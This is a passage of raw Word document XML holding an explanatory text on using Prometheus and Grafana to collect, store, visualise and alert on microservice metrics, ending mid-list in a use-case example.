    <w:p w14:paraId="766B2353"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Prometheus is a powerful </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source monitoring and alerting toolkit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> primarily focused on </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is widely used to monitor microservices because of its ability to scrape, store, and query time-series data efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737191F"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Key Features of Prometheus:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB7860"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Time-Series Data Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus collects time-series data through a pull-based mechanism. It scrapes metrics from exposed endpoints (e.g., /metrics in Spring Boot applications with Actuator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5EAF9"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Multi-dimensional Data Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus stores data with labels (key-value pairs), enabling detailed metrics segmentation, such as by service name, request type, or environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3FBBE"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Powerful Query Language (PromQL)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Prometheus uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PromQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Prometheus Query Language) to query and aggregate metrics over time. This allows for flexible and detailed querying for different use cases (e.g., calculating average request response time, error rates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFD8515"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lastRenderedPageBreak/>
        <w:t>Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Prometheus can generate alerts based on metric thresholds. These alerts can be integrated with external systems (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Alertmanager</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to trigger notifications via email, SMS, or Slack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E76766"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Pull-based Scraping</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus collects metrics by regularly polling HTTP endpoints exposed by microservices. This is ideal for distributed systems, as each service can expose its metrics in a standardized format, and Prometheus scrapes them at regular intervals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157675C5"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How Prometheus Works in Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90C581"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Metrics Exposure</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each microservice exposes metrics through an endpoint (e.g., /actuator/prometheus in Spring Boot with Spring Actuator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F5D5E1"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Scraping</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus regularly scrapes metrics from these endpoints and stores them in its time-series database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B07DB"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Metrics Types</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus supports multiple types of metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0944B6"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Counter</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monotonically increasing metric (e.g., number of requests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DC007"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Gauge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A value that can go up and down (e.g., memory usage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDC9213"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Histogram</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Distributes values into buckets (e.g., request duration).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDCD251" w14:textId="77777777" w:rsidR="00D056EB" w:rsidRPr="00FA65E9" w:rsidRDefault="00D056EB"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Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks quantiles over a sliding time window (e.g., average response time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287D7187" w14:textId="77777777" w:rsidR="00D056EB"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36C4F37">
          <v:rect id="_x0000_i2841" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F790482"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2. Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEDF79"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Grafana is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>open-source data visualization platform</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used for creating dashboards and visualizing metrics collected by systems like Prometheus. It integrates seamlessly with Prometheus and other data sources to display real-time metrics and performance metrics in interactive dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFDC55"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Key Features of Grafana:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E746546"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Rich Visualizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana offers a wide range of visualization options such as graphs, heatmaps, tables, and gauges. These help display time-series data in a clear and actionable format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725DF157"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Custom Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Users can create </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that show metrics relevant to different aspects of the system, such as application performance, infrastructure health, or database query times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19007851"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Alerting and Notifications</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana can also send alerts based on the defined thresholds and trigger notifications when certain conditions are met. Alerts can be configured to integrate with Slack, email, or other notification systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42146982"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Support for Multiple Data Sources</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Grafana is not limited to Prometheus and can integrate with many other data sources like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>InfluxDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24206EE7"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User Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana offers role-based access control (RBAC) so that users with different levels of access can view or modify dashboards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4B631F"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How Grafana Works in Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66264F83"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Data Source Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana is configured to pull metrics data from Prometheus (or other sources) by setting up Prometheus as a data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C537B8"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Creating Dashboards</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once the data source is configured, users can create dashboards in Grafana to visualize metrics. For example, you could have a dashboard showing request rates, latency, error rates, and resource utilization across all microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F77399"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Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana can monitor metrics over time and trigger alerts if they exceed certain thresholds (e.g., high latency or error rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A81AF"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Time-Based Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana allows users to perform time-based analysis of system metrics to identify trends or anomalies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EDECE4" w14:textId="77777777" w:rsidR="00D056EB"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D27A427">
          <v:rect id="_x0000_i2842" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A5CA42"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Integration of Prometheus and Grafana in Microservices Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D213D"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Metrics Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each microservice exposes </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., through Spring Boot Actuator's /actuator/prometheus endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50010424"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Prometheus Scrapes Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus scrapes the metrics exposed by each microservice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5208B0E5"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Prometheus Stores Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus stores the scraped metrics in its time-series database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32771689"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Grafana Visualization</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana fetches the stored data from Prometheus and visualizes it in user-friendly dashboards. These dashboards can display the health, performance, and resource usage of the microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA85B57"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Real-Time Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The integration allows for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the application and infrastructure. For example, you can monitor response times, request volumes, error rates, and system health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4DCB7"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Alerting and Notification</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus and Grafana both support alerting, so if a metric crosses a predefined threshold (e.g., high CPU usage or increased error rates), alerts can be triggered and notifications sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41543697" w14:textId="77777777" w:rsidR="00D056EB"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4D16EB2">
          <v:rect id="_x0000_i2843" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BF1E17"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Use Case Example in Microservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF22D05"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Let's say you have a microservices architecture with the following services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B622C2"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lastRenderedPageBreak/>
        <w:t>User Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736055BF"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Order Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C68888"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Inventory Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870A4E5"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Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will scrape the following metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472B6B7"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Request rate for each service (requests per second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD855EF"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Response time for each service (average response time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965884C"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Error rate (5xx HTTP errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A7041"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Resource utilization (CPU, memory).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52211A45"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Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will then visualize these metrics in a dashboard. You might have separate panels for each service that show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF9ACCB"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number of requests per second</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766DEE2"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>average response time</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>request latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081569A"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>error rate</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., 4xx/5xx HTTP responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE404E5"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
